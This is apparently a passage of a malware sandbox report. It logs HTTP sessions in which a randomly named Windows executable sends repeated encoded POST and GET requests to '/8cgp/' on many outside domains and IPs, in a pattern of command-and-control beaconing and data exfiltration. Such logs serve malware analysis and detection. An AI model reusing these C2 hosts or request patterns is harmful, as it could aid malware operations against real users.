                                                                    42 | 192.168.11.20 | 50287 | 173.232.100.113 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:31:21.226902962 CEST | 993 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.whjzff.com
                                                                    Origin: http://www.whjzff.com
                                                                    Referer: http://www.whjzff.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:31:21.392082930 CEST | 305 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:31:21 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 162
                                                                    Connection: close
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    43 | 192.168.11.20 | 50288 | 173.232.100.113 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:31:23.915170908 CEST | 2578 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.whjzff.com
                                                                    Origin: http://www.whjzff.com
                                                                    Referer: http://www.whjzff.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:31:24.080440044 CEST | 305 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:31:23 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 162
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    44 | 192.168.11.20 | 50289 | 173.232.100.113 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:31:26.600867033 CEST | 387 | OUT | GET /8cgp/?Xh9lX=1MJjEON/uhpbuDEqbkHBFEkwk/hMmapOQ6TXfH8Ig3o6kyo9vDLLjAAJ58FhZwMWBw3WEeqXS0siPV8x1sARUVUsjrzf4e0UfFtBtuYJdiL+lQFlVX0tNTo=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.whjzff.com
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:31:26.765889883 CEST | 305 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:31:26 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 162
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    45 | 192.168.11.20 | 50290 | 51.77.215.151 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:31:35.125386953 CEST | 392 | OUT | GET /8cgp/?QDnH=ERXP8&Xh9lX=Rt3kyQgIVYud0ZxfjVmkNGlq6oguJ3Bu0zZO/jPZwrZwphqha226ELu53C2wC06UMZB3RXlB5IubdFV8wNllBFtqfqdEgmnsNC5NpQzeW4FZZkQ+d4TAHSc= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.arilyfarlico.ru
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:31:35.428301096 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                    Date: Wed, 24 Apr 2024 10:31:35 GMT
                                                                    Server: Apache
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Content-Length: 20
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Data Raw: 55 6e 6b 6e 6f 77 6e 20 72 65 71 75 65 73 74 20 74 79 70 65
                                                                    Data Ascii: Unknown request type


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    46 | 192.168.11.20 | 50291 | 64.190.62.22 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:31:40.758810997 CEST | 686 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.donantedeovulos.space
                                                                    Origin: http://www.donantedeovulos.space
                                                                    Referer: http://www.donantedeovulos.space/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:31:41.069983959 CEST | 299 | IN | HTTP/1.1 405 Not Allowed
                                                                    date: Wed, 24 Apr 2024 10:31:40 GMT
                                                                    content-type: text/html
                                                                    content-length: 154
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    47 | 192.168.11.20 | 50292 | 64.190.62.22 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:31:43.601685047 CEST | 1026 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.donantedeovulos.space
                                                                    Origin: http://www.donantedeovulos.space
                                                                    Referer: http://www.donantedeovulos.space/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:31:43.912746906 CEST | 299 | IN | HTTP/1.1 405 Not Allowed
                                                                    date: Wed, 24 Apr 2024 10:31:43 GMT
                                                                    content-type: text/html
                                                                    content-length: 154
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    48 | 192.168.11.20 | 50293 | 64.190.62.22 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:31:46.445893049 CEST | 2578 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.donantedeovulos.space
                                                                    Origin: http://www.donantedeovulos.space
                                                                    Referer: http://www.donantedeovulos.space/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:31:46.757061958 CEST | 299 | IN | HTTP/1.1 405 Not Allowed
                                                                    date: Wed, 24 Apr 2024 10:31:46 GMT
                                                                    content-type: text/html
                                                                    content-length: 154
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    49 | 192.168.11.20 | 50294 | 64.190.62.22 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:31:49.282418013 CEST | 398 | OUT | GET /8cgp/?Xh9lX=0rOrON9KCedqtp/KEErYODOsqb1Ol5SKTVjby8oNAnBpXQ3f6KiEeGIyIQ0Oonef/1tP4f58WruRrbReuj87L8qx+pUtt26y1FhkvVaaULxp4u5kv8q4N/k=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.donantedeovulos.space
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:31:49.618956089 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                    date: Wed, 24 Apr 2024 10:31:49 GMT
                                                                    content-type: text/html; charset=UTF-8
                                                                    transfer-encoding: chunked
                                                                    vary: Accept-Encoding
                                                                    x-powered-by: PHP/8.1.17
                                                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                    pragma: no-cache
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_eKr9LQaF/UwlZ82oytgOoGCf7MqvkeVp4z2edrRx+2MyvbiJBOr1DeaA9QlHvRzAkWizzaWWo+6BdQyWjrGQGQ==
                                                                    last-modified: Wed, 24 Apr 2024 10:31:49 GMT
                                                                    x-cache-miss-from: parking-6fb6b6d5c7-dq5hw
                                                                    server: NginX
                                                                    connection: close


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    50 | 192.168.11.20 | 50295 | 108.186.8.155 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:32:11.569351912 CEST | 656 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.kader42.top
                                                                    Origin: http://www.kader42.top
                                                                    Referer: http://www.kader42.top/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:32:11.744616032 CEST | 240 | IN | HTTP/1.1 200 OK
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Encoding: gzip
                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                    X-Powered-By: Nginx
                                                                    Date: Wed, 24 Apr 2024 10:32:11 GMT
                                                                    Connection: close


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    51 | 192.168.11.20 | 50296 | 108.186.8.155 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:32:14.272114992 CEST | 996 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.kader42.top
                                                                    Origin: http://www.kader42.top
                                                                    Referer: http://www.kader42.top/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:32:14.447753906 CEST | 240 | IN | HTTP/1.1 200 OK
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Encoding: gzip
                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                    X-Powered-By: Nginx
                                                                    Date: Wed, 24 Apr 2024 10:32:13 GMT
                                                                    Connection: close


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    52 | 192.168.11.20 | 50297 | 108.186.8.155 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:32:16.975297928 CEST | 2578 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.kader42.top
                                                                    Origin: http://www.kader42.top
                                                                    Referer: http://www.kader42.top/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Ascii: h7EtzF4VTme2art6u2Nj/7FwnbkeGW85a1pziWNgjbPu2BeSXtUvKR86muSP+a4tiE6hJpSkT7Ov3FHEUUsghN4RU5lN89/11+lCKjy/Ae4cadQmlj3bO/XnfHUjGBVFPR1g22p9+7dQM5iTNQdGUZq33o6WjGPcmOCuQz3lgRnlTEL/jtCeM203Q/kKNQs17tz5Yiw2td9Z7dMPj2pnl+Lc+zh0ZK2HEcdfJIC9tkqci9p5KGR
                                                                    Apr 24, 2024 12:32:17.150012016 CEST14179OUTData Raw: 57 54 37 43 39 36 48 54 45 6b 44 68 65 38 67 62 72 51 66 54 31 33 38 30 4e 36 55 45 35 74 35 73 78 32 36 63 54 4c 52 77 35 42 68 45 50 43 51 37 30 39 79 32 69 54 6a 74 42 4d 66 66 6d 72 68 75 51 39 6b 6a 67 59 6a 2b 6b 4b 7a 42 70 61 72 36 4d 37
                                                                    Data Ascii: WT7C96HTEkDhe8gbrQfT1380N6UE5t5sx26cTLRw5BhEPCQ709y2iTjtBMffmrhuQ9kjgYj+kKzBpar6M7MPWAIM4hXNKjo6VfRgw3GTLolwDR/fcs9n2uw8a0Q15fFLttRiVaJlGSrtBopSbPthmqaeVEbmhKB4ub8Y+Sw3QOmzO/3u724W6uW1D9WQ3AIQwIzNoOcXPQiT+7SYFFg0jxt0zYwwtNsJ1sZqBjo/JrdfUssmf5T
                                                                    Apr 24, 2024 12:32:17.150158882 CEST | 240 | IN | HTTP/1.1 200 OK
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Encoding: gzip
                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                    X-Powered-By: Nginx
                                                                    Date: Wed, 24 Apr 2024 10:32:16 GMT
                                                                    Connection: close


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    53 | 192.168.11.20 | 50298 | 108.186.8.155 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:32:19.671590090 CEST | 388 | OUT | GET /8cgp/?QDnH=ERXP8&Xh9lX=TrWImKkXg72XbxtkItxdCHOg9XWXWDqE4iO1qHTBwn9T3tQecLtkumbZqYeYuSkxtGpQmOvVFI5PSbSpBsnHilSWnmtQ3orkxGs2pUIdqKkLQC6qurdmbFs= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.kader42.top
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:32:19.841404915 CEST | 209 | IN | HTTP/1.1 200 OK
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                    X-Powered-By: Nginx
                                                                    Date: Wed, 24 Apr 2024 10:32:19 GMT
                                                                    Connection: close
                                                                    Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                    Data Ascii: 3
                                                                    Apr 24, 2024 12:32:19.841505051 CEST | 805 | IN | Data Raw: 33 31 65 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 e5 a8
                                                                    Data Ascii: 31e<html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script>(function(){ var bp = document.c
                                                                    Apr 24, 2024 12:32:19.841517925 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    54 | 192.168.11.20 | 50299 | 84.32.84.32 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:32:25.195786953 CEST | 662 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.noispisok.com
                                                                    Origin: http://www.noispisok.com
                                                                    Referer: http://www.noispisok.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 79 61 39 6e 61 37 48 75 72 71 4d 77 47 77 52 72 59 6b 7a 44 4b 4b 39 51 58 31 6e 72 55 52 6b 2b 45 6c 67 32 61 62 62 54 45 2f 36 6b 62 2b 6f 4b 76 49 77 6f 30 49 4e 79 6c 6b 70 4e 6d 49 51 6f 6a 6b 55 33 4b 7a 48 39 63 52 63 77 6b 75 37 76 74 7a 54 76 54 63 62 78 62 4b 70 59 6d 4c 38 70 31 4c 56 73 4a 5a 4a 49 42 35 51 58 63 44 70 6b 47 75 5a 56 78 78 69 65 72 48 49 77 47 4a 6c 69 69 56 41 64 6f 69 48 6b 44 57 66 30 69 63 54 74 2f 6f 54 42 69 53 42 6d 74 5a 32 54 44 7a 69 61 62 5a 51 68 35 64 37 38 47 50 79 6b 34 32 31 4d 36 44 4a 34 53 76 6a 48 4d 39 59 37 48 6b 4d 4b 66 41 3d 3d
                                                                    Data Ascii: Xh9lX=ya9na7HurqMwGwRrYkzDKK9QX1nrURk+Elg2abbTE/6kb+oKvIwo0INylkpNmIQojkU3KzH9cRcwku7vtzTvTcbxbKpYmL8p1LVsJZJIB5QXcDpkGuZVxxierHIwGJliiVAdoiHkDWf0icTt/oTBiSBmtZ2TDziabZQh5d78GPyk421M6DJ4SvjHM9Y7HkMKfA==


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    55 | 192.168.11.20 | 50300 | 84.32.84.32 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:32:28.051613092 CEST | 1002 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.noispisok.com
                                                                    Origin: http://www.noispisok.com
                                                                    Referer: http://www.noispisok.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    56 | 192.168.11.20 | 50301 | 84.32.84.32 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:32:30.916127920 CEST | 2578 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.noispisok.com
                                                                    Origin: http://www.noispisok.com
                                                                    Referer: http://www.noispisok.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    57 | 192.168.11.20 | 50302 | 84.32.84.32 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:32:33.771473885 CEST | 390 | OUT | GET /8cgp/?Xh9lX=/YVHZOSW055QRFdzHV7EG4MPV06WciwOGAsmatOqDuiKItV6nqBs0pBRyzlLrNgNpWUhFR7Gbz8/7vzQvyrSOcbiMu9Z7oEFzfRxNbVqKIwXHjZvBpZwwR0=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.noispisok.com
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:32:34.106499910 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                    Server: hcdn
                                                                    Date: Wed, 24 Apr 2024 10:32:33 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 10072
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    x-hcdn-request-id: 0b1cbfa052c522b2e9456d1a1d783bbe-asc-edge6
                                                                    Expires: Wed, 24 Apr 2024 10:32:32 GMT
                                                                    Cache-Control: no-cache
                                                                    Accept-Ranges: bytes
